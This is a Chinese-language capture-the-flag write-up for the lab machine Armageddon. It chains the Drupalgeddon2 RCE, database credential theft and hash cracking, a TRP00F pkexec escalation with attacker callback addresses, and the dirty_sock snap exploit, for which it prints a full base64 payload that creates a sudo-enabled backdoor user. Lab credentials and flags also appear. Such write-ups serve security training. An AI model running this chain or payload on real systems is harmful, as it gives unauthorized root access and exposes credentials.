[Meachines] [Easy] Armageddon Drupal 7 RCE+TRP00F权限提升+Snap dirty_sock权限提升

Information Gathering

IP Address Opening Ports
10.10.10.233 TCP:22,80

$ ip='10.10.10.233'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82c6bbc7026a93bb7ccbdd9c30937934 (RSA)
|   256 3aca9530f312d7ca4505bcc7f116bbfc (ECDSA)
|_  256 7ad4b36879cf628a7d5a61e7060f5f33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to  Armageddon |  Armageddon
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

Drupal 7 RCE

http://10.10.10.233/

https://github.com/dreadlocked/Drupalgeddon2/blob/master/drupalgeddon2.rb

$ ruby drupalgeddon2.rb http://10.10.10.233/

Lateral Movement

$ cat /var/www/html/sites/default/settings.php

username:drupaluser
password:CQHEy@9M*m23gBVj

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "SHOW DATABASES;"

$ mysqldump -u drupaluser -pCQHEy@9M*m23gBVj drupal > res.txt

$ grep "INSERT INTO \`users\`" res.txt

$ john hash -w rockyou.txt

booboo

User.txt

1afa82c98c5e7cd47410189b10c366d9

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

Privilege Escalation:Snap dirty_sock exploit

制作恶意的snap包

$ sudo apt install snapd

https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html

https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py

利用 Ubuntu 系统中 snapd 服务漏洞进行本地权限提升的脚本。该脚本通过侧加载包含创建本地用户的 Snap 包,来提升权限。

$ python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > exp.snap

$ su dirty_sock

$ sudo su

Root.txt

cc24a5b72cb785d9a58d812e2ba3ea93

相关推荐
H轨迹H18 小时前
Vulnhub-Zico2靶机-漏扫弱口令数据库+文件包含反弹shell+zip,tar提权
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
SecRIO1 天前
[SWPUCTF 2022 新生赛]1z_unserialize
php·ctf·php反序列化
H轨迹H3 天前
Jsmoke-一款强大的js检测工具,浏览器部署即用,使用方便且高效
网络安全·渗透测试·ctf·工具·web漏洞·信息泄露
Sweet_vinegar3 天前
vim临时文件泄露
linux·安全·网络安全·vim·web·ctf·ctfshow
H轨迹H4 天前
Vulnhub-Troll-1靶机-ftp匿名登录+流量包分析+hydra爆破+ssh登录脚本提权
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
hking1114 天前
[MRCTF2020]Ezpop
php·ctf
H轨迹H5 天前
Vulnhub-DC-9靶机-SQL注入拿到账户+利用端口敲门连接ssh+信息泄露利用root脚本追加提权
网络安全·渗透测试·vulnhub·ctf·靶机·oscp
轨迹H5 天前
BUUCTF-Web方向21-25wp
前端·网络安全·web·ctf·buuctf
H轨迹H8 天前
BUUCTF-Web方向21-25wp
网络安全·渗透测试·ctf